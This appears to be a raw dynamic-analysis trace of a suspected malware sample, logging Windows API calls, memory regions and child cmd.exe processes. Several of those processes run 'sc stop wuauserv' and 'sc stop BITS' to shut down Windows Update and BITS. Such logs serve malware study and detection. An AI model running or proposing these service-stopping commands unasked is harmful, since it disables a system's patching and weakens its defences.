-20 [0020.762] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0020.762] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0020.764] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop wuauserv", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x34ef70*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc stop wuauserv", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34efbc | out: lpCommandLine="sc stop wuauserv", lpProcessInformation=0x34efbc*(hProcess=0x78, hThread=0x74, dwProcessId=0xad4, dwThreadId=0xad8)) returned 1 [0020.891] CloseHandle (hObject=0x74) returned 1 [0020.891] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0020.891] GetEnvironmentStringsW () returned 0x3a5ee8* [0020.892] FreeEnvironmentStringsW (penv=0x3a5ee8) returned 1 [0020.892] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0021.924] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x34eeb0 | out: lpExitCode=0x34eeb0*=0x426) returned 1 [0021.925] CloseHandle (hObject=0x78) returned 1 [0021.925] _vsnwprintf (in: _Buffer=0x34eff8, _BufferCount=0x13, _Format="%08X", _ArgList=0x34eebc | out: _Buffer="00000426") returned 8 [0021.925] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000426") returned 1 [0021.925] GetEnvironmentStringsW () returned 0x3a40a8* [0021.925] FreeEnvironmentStringsW (penv=0x3a40a8) returned 1 [0021.925] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0021.925] GetEnvironmentStringsW () returned 0x3a40a8* [0021.925] FreeEnvironmentStringsW (penv=0x3a40a8) returned 1 [0021.925] DeleteProcThreadAttributeList (in: lpAttributeList=0x34ef14 | out: lpAttributeList=0x34ef14) [0021.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.925] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.926] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.926] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.926] SetConsoleInputExeNameW () returned 0x1 [0021.926] GetConsoleOutputCP () returned 0x1b5 [0021.926] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.926] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.926] exit (_Code=1062) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x646ee000" os_pid = "0xa78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C sc stop BITS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 459 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 460 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 461 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 462 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 463 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 464 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 465 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 466 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a51829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 467 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 468 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 469 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 470 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 471 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 472 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 473 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 474 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 475 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 476 start_va = 0x240000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 477 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 478 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 479 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 588 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 589 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 590 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 591 start_va = 0x3d0000 end_va = 0x436fff entry_point = 0x3d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 592 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 593 start_va = 0x74c80000 end_va = 0x74c86fff entry_point = 0x74c81230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 594 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 595 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 596 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 597 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 598 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 599 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 600 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 601 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 602 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 603 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 604 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 605 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 606 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 607 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 608 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 609 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 623 start_va = 0x5d0000 end_va = 0x757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 624 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 625 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 626 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 627 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 628 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 629 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 630 start_va = 0x760000 end_va = 0x8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 631 start_va = 0x8f0000 end_va = 0x1ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 632 start_va = 0x1cf0000 end_va = 0x2032fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cf0000" filename = "" Region: id = 651 start_va = 0x2040000 end_va = 0x230efff entry_point = 0x2040000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 25 os_tid = 0xa7c [0020.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18facc | out: lpSystemTimeAsFileTime=0x18facc*(dwLowDateTime=0x13eb1b60, dwHighDateTime=0x1d35d7b)) [0020.646] GetCurrentProcessId () returned 0xa78 [0020.646] GetCurrentThreadId () returned 0xa7c [0020.646] GetTickCount () returned 0x144ad [0020.646] QueryPerformanceCounter (in: lpPerformanceCount=0x18fac4 | out: lpPerformanceCount=0x18fac4*=322092698) returned 1 [0020.648] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0020.648] __set_app_type (_Type=0x1) [0020.648] __p__fmode () returned 0x76d831f4 [0020.648] __p__commode () returned 0x76d831fc [0020.648] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0020.648] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0020.649] GetCurrentThreadId () returned 0xa7c [0020.649] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa7c) returned 0x60 [0020.649] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0020.649] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0020.649] SetThreadUILanguage (LangId=0x0) returned 0x409 [0020.770] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0020.770] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fa5c | out: phkResult=0x18fa5c*=0x0) returned 0x2 [0020.770] VirtualQuery (in: lpAddress=0x18fa93, lpBuffer=0x18fa2c, dwLength=0x1c | out: lpBuffer=0x18fa2c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.770] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fa2c, dwLength=0x1c | out: lpBuffer=0x18fa2c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0020.770] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fa2c, dwLength=0x1c | out: lpBuffer=0x18fa2c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0020.770] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fa2c, dwLength=0x1c | out: lpBuffer=0x18fa2c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.770] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fa2c, dwLength=0x1c | out: lpBuffer=0x18fa2c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.770] GetConsoleOutputCP () returned 0x1b5 [0020.770] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0020.771] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0020.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.771] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0020.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.771] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0020.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.771] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0020.771] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.771] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0020.772] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.772] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0020.772] GetEnvironmentStringsW () returned 0x2e2010* [0020.772] FreeEnvironmentStringsW (penv=0x2e2010) returned 1 [0020.772] GetEnvironmentStringsW () returned 0x2e2010* [0020.772] FreeEnvironmentStringsW (penv=0x2e2010) returned 1 [0020.772] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e9cc | out: phkResult=0x18e9cc*=0x68) returned 0x0 [0020.772] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x0, lpData=0x18e9d8*=0x0, lpcbData=0x18e9d0*=0x1000) returned 0x2 [0020.772] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x4, lpData=0x18e9d8*=0x1, lpcbData=0x18e9d0*=0x4) returned 0x0 [0020.772] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x0, lpData=0x18e9d8*=0x1, lpcbData=0x18e9d0*=0x1000) returned 0x2 [0020.772] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x4, lpData=0x18e9d8*=0x0, lpcbData=0x18e9d0*=0x4) returned 0x0 [0020.772] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x4, lpData=0x18e9d8*=0x40, lpcbData=0x18e9d0*=0x4) returned 0x0 [0020.773] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x4, lpData=0x18e9d8*=0x40, lpcbData=0x18e9d0*=0x4) returned 0x0 [0020.773] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x0, lpData=0x18e9d8*=0x40, lpcbData=0x18e9d0*=0x1000) returned 0x2 [0020.773] RegCloseKey (hKey=0x68) returned 0x0 [0020.773] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e9cc | out: phkResult=0x18e9cc*=0x68) returned 0x0 [0020.773] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x0, lpData=0x18e9d8*=0x40, lpcbData=0x18e9d0*=0x1000) returned 0x2 [0020.773] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x4, lpData=0x18e9d8*=0x1, lpcbData=0x18e9d0*=0x4) returned 0x0 [0020.773] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x0, lpData=0x18e9d8*=0x1, lpcbData=0x18e9d0*=0x1000) returned 0x2 [0020.773] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x4, lpData=0x18e9d8*=0x0, lpcbData=0x18e9d0*=0x4) returned 0x0 [0020.774] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x4, lpData=0x18e9d8*=0x9, lpcbData=0x18e9d0*=0x4) returned 0x0 [0020.774] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x4, lpData=0x18e9d8*=0x9, lpcbData=0x18e9d0*=0x4) returned 0x0 [0020.774] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e9d4, lpData=0x18e9d8, lpcbData=0x18e9d0*=0x1000 | out: lpType=0x18e9d4*=0x0, lpData=0x18e9d8*=0x9, lpcbData=0x18e9d0*=0x1000) returned 0x2 [0020.774] RegCloseKey (hKey=0x68) returned 0x0 [0020.774] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db4 [0020.774] srand (_Seed=0x5a0b3db4) [0020.774] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop BITS" [0020.774] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop BITS" [0020.774] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.774] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e2018, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0020.774] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.774] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.774] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.774] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0020.774] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0020.774] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0020.774] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0020.774] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0020.774] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0020.774] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0020.774] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0020.774] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0020.775] GetEnvironmentStringsW () returned 0x2e2228* [0020.775] FreeEnvironmentStringsW (penv=0x2e2228) returned 1 [0020.775] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0020.775] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.775] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0020.775] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0020.775] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0020.775] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0020.775] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0020.775] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0020.775] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0020.775] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0020.775] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f798 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18f798, lpFilePart=0x18f794 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f794*="Desktop") returned 0x25 [0020.775] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.775] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f514 | out: lpFindFileData=0x18f514) returned 0x2e1e90 [0020.776] FindClose (in: hFindFile=0x2e1e90 | out: hFindFile=0x2e1e90) returned 1 [0020.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f514 | out: lpFindFileData=0x18f514) returned 0x2e1e90 [0020.776] FindClose (in: hFindFile=0x2e1e90 | out: hFindFile=0x2e1e90) returned 1 [0020.776] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0020.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f514 | out: lpFindFileData=0x18f514) returned 0x2e1e90 [0020.776] FindClose (in: hFindFile=0x2e1e90 | out: hFindFile=0x2e1e90) returned 1 [0020.776] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.776] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0020.776] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0020.776] GetEnvironmentStringsW () returned 0x2e4098* [0020.776] FreeEnvironmentStringsW (penv=0x2e4098) returned 1 [0020.776] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.777] GetConsoleOutputCP () returned 0x1b5 [0020.777] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0020.777] GetUserDefaultLCID () returned 0x409 [0020.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 